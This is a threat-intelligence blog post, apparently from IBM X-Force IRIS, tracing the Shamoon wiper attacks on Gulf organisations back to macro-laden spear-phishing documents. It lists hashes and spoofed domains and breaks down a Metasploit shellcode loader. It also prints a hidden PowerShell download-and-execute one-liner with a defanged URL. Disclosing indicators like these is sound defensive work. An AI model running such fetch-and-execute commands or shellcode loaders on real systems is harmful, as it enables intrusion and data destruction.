Authored by the IBM X-Force Incident Response and Intelligence Services (IRIS) team.

Researchers from the IBM X-Force Incident Response and Intelligence Services (IRIS) team identified a missing link in the operations of a threat actor involved in recent Shamoon malware attacks against Gulf state organizations. These attacks, which occurred in November 2016 and January 2017, reportedly affected thousands of computers across multiple government and civil organizations in Saudi Arabia and elsewhere in Gulf states. Shamoon is designed to destroy computer hard drives by wiping the master boot record (MBR) and data irretrievably, unlike ransomware, which holds the data hostage for a fee.

Through their recent investigations, our forensics analysts pinpointed the initial compromise vector and post-compromise operations that led to the deployment of the destructive Shamoon malware on targeted infrastructures. It’s worth mentioning that, according to X-Force IRIS, the initial compromise took place weeks before the actual Shamoon deployment and activation were launched.

Shamoon Attacks Preceded by Malicious Macros and PowerShell Commands

Since Shamoon incidents feature the infiltration and escalation stages of targeted attacks, X-Force IRIS responders sought out the attackers’ entry point. Their findings pointed to what appears to be the initial point of compromise the attackers used: a document containing a malicious macro that, when approved to execute, enabled C2 communications to the attacker’s server and remote shell via PowerShell.

The document was not the only one discovered in the recent attack waves. X-Force IRIS researchers had been tracking earlier activity associated with similar malicious, PowerShell-laden documents themed as resumes and human resources documents, some of which related to organizations in Saudi Arabia. This research identified several bouts of offensive activity that occurred in the past few months, which revealed similar operational methods in which the attackers served malicious documents and other malware executables from web servers to their targets to establish an initial foothold in the network.

Read the white paper: Dealing with a data breach — Before, During and After

Initial Compromise Vector Previously Unclear

Although Shamoon was previously documented in research blogs, the specific network compromise methods leading to the attacks have remained unclear in the reported cases. X-Force IRIS researchers studied Shamoon’s attack life cycle and observed its tactics at Saudi-based organizations and private sector companies. This research led them to believe that the actor using Shamoon in recent attacks relied heavily on weaponized documents built to leverage PowerShell to establish their initial network foothold and subsequent operations:

  1. Attackers send a spear phishing email to employees at the target organization. The email contains a Microsoft Office document as an attachment.
  2. Opening the attachment from the email invokes PowerShell and enables command line access to the compromised machine.
  3. Attackers can now communicate with the compromised machine and remotely execute commands on it.
  4. The attackers use their access to deploy additional tools and malware to other endpoints or escalate privileges in the network.
  5. Attackers study the network by connecting to additional systems and locating critical servers.
  6. The attackers deploy the Shamoon malware.
  7. A coordinated Shamoon outbreak begins and computer hard drives across the organization are permanently wiped.

Figure 1: Shamoon Attack — Logical Flow of Events

A Phish Is Speared

X-Force IRIS identified the below malicious document:

Detail Info
File name cv_itworx.doc
MD5 45b0e5a457222455384713905f886bd4
SHA256 528714aaaa4a083e72599c32c18aa146db503eee80da236b20aea11aa43bdf62
Hosting URL hxxp://[.]me/cv_itworx.doc
Decode PowerShell.exe -w hidden -noni -nop -c “iex(New-Object System.Net.WebClient).DownloadString(‘hxxp://’)”
Scroll to view full table

Our researchers examined the domain that hosted the first malicious file,[.]me. Per the domain’s WHOIS record, an anonymized registrant registered com-ho[.]me in October 2016 and used it to serve malicious documents with similar macro activation features. The following list of documents included:

File Name File MD5
cv.doc f4d18316e367a80e1005f38445421b1f
cv_itworx.doc 45b0e5a457222455384713905f886bd4
cv_mci.doc f4d18316e367a80e1005f38445421b1f
discount_voucher_codes.xlsm 19cea065aa033f5bcfa94a583ae59c08
Health_insurance_plan.doc ecfc0275c7a73a9c7775130ebca45b74
Health_insurance_registration.doc 1b5e33e5a244d2d67d7a09c4ccf16e56
job_titles.doc fa72c068361c05da65bf2117db76aaa8
job_titles_itworx.doc 43fad2d62bc23ffdc6d301571135222c
job_titles_mci.doc ce25f1597836c28cf415394fb350ae93
Password_Policy.xlsm 03ea9457bf71d51d8109e737158be888
Scroll to view full table

These files were most likely delivered via spear phishing emails to lure employees into unwittingly launching the malicious payload.

A closer review of the file names revealed “IT Worx” and “MCI.” A search of the name IT Worx brings up a global software professional services organization headquartered in Egypt. MCI is Saudi Arabia’s Ministry of Commerce and Investment. It is possible these names were used in spear phishing emails because they would seem benign to Saudi-based employees and lure them to open the attachment.

X-Force IRIS researchers further identified that the threat actor behind the malicious documents served many of them using a URL-shortening scheme in the following pattern: briefl[.]ink/{a-z0-9}[5].

File Detail Info
File name job_titles_itworx.doc
MD5 43fad2d62bc23ffdc6d301571135222c
SHA256 e5b643cb6ec30d0d0b458e3f2800609f260a5f15c4ac66faf4ebf384f7976df6
Hosting URL hxxp://
Scroll to view full table

The following figure is a visual example of what employees may have encountered when they opened the malicious Word files sent to them in preparation for a Shamoon attack:

Figure 2: Malicious Word Document Delivered in Preparation of a Shamoon Malware Attack (Source: X-Force IRIS)

Passive DNS results on a communications domain associated with the Shamoon attack revealed related network infrastructure, identifying additional domains used by the threat actors.

Domain Name Spoofed Site
ntg-sa[.]com The domain ntg-sa[.]com appears to spoof the legit domain associated with the Namer Trading Group. Per their webpage, NTG “was established primarily to cater the growing demands of Petrochemicals waste management within the Kingdom of Saudi Arabia.”
maps-modon[.]club The maps-modon[.]club domain appears to spoof, which is associated with the Saudi Industrial Property Authority, an organization “responsible for the development of industrial cities with integrated infrastructure and services.”
Scroll to view full table

X-Force IRIS discovered that the threat actor was hosting at least one malicious executable on a server hosted on ntg-sa[.]com. This file duped targets into believing it was a Flash player installer that would drop a Windows batch to invoke PowerShell into the same C2 communications.

Breakdown of the PowerShell-Related Macro

Analysis of one of the threat actor’s documents found that if the macro executes, it launches two separate PowerShell Scripts. The first one executes a PowerShell script served from hxxp:// The host is possibly related to attacks that served the Pupy RAT, a publicly available cross-platform remote access tool.

The second script calls VirtualAlloc to create a buffer, uses memset to load Metasploit-related shellcode into that buffer and executes it through CreateThread. Metasploit is an open source framework popular as a tool for developing and executing exploit code against a remote target machine. The shellcode performs a DWORD XOR of 4 bytes at an offset from the beginning of the shellcode that changes the code to create a loop so the XOR continues 0x57 times.

If this execution is successful, it creates a buffer using VirtualAlloc and calls InternetReadFile in a loop until all the file contents are retrieved from hxxp:// This is then returned as a string to PowerShell, which calls invoke-expression (iex) on it, indicating that the expected payload is PowerShell.

Of note, the macro contained a DownloadFile() function that would use URLDownloadToFileA, but this was never actually used.

Based on observations associated with the malicious document, we observed subsequent shell sessions probably associated with Metasploit’s Meterpreter that enabled deployment of additional tools and malware preceding deployment of three Shamoon-related files: ntertmgr32.exe, ntertmgr64.exe and vdsk911.sys.

Shamoon’s Back, But for How Long This Time?

Although the complete list of Shamoon’s victims is not public, Bloomberg reported that in one case, thousands of computers were destroyed at the headquarters of Saudi’s General Authority of Civil Aviation, erasing critical data and bringing operations to a halt for several days.

The recent activity X-Force IRIS is seeing from the Shamoon attackers has so far been detected in two waves, but those are likely to subside following the public attention the cases have garnered since late 2016.

Saudi Arabia released a warning to local organizations about the Shamoon malware, alerting about potential attacks and advising organizations to prepare. Analysis and warnings about Shamoon are resulting in preparation on the targets’ end, and actors are likely to disappear and change their tactics until the next wave of attacks.

Read the white paper: Dealing with a data breach — Before, During and After

For technical details on this research and related indicators of compromise, see the X-Force Advisory on X-Force Exchange.

More from Advanced Threats

GootBot – Gootloader’s new approach to post-exploitation

8 min read - IBM X-Force discovered a new variant of Gootloader — the "GootBot" implant — which facilitates stealthy lateral movement and makes detection and blocking of Gootloader campaigns more difficult within enterprise environments. X-Force observed these campaigns leveraging SEO poisoning, wagering on unsuspecting victims' search activity, which we analyze further in the blog. The Gootloader group’s introduction of their own custom bot into the late stages of their attack chain is an attempt to avoid detections when using off-the-shelf tools for C2…

Black Hat 2022 Sneak Peek: How to Build a Threat Hunting Program

4 min read - You may recall my previous blog post about how our X-Force veteran threat hunter Neil Wyler (a.k.a “Grifter”) discovered nation-state attackers exfiltrating unencrypted, personally identifiable information (PII) from a company’s network, unbeknownst to the security team. The post highlighted why threat hunting should be a baseline activity in any environment. Before you can embark on a threat hunting exercise, however, it’s important to understand how to build, implement and mature a repeatable, internal threat hunting program. What are the components…

Top-ranking banking trojan Ramnit out to steal payment card data

4 min read - Shopping online is an increasingly popular endeavor, and it has accelerated since the COVID-19 pandemic. Online sales during the 2021 holiday season rose nearly 9% to a record $204.5 billion. Mastercard says that shopping jumped 8.5% this year compared to 2020 and 61.4% compared to pre-pandemic levels. Cyber criminals are not missing this trend. The Ramnit Trojan, in particular, is out for a shopping spree that’s designed to take over people’s online accounts and steal their payment card data. IBM…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today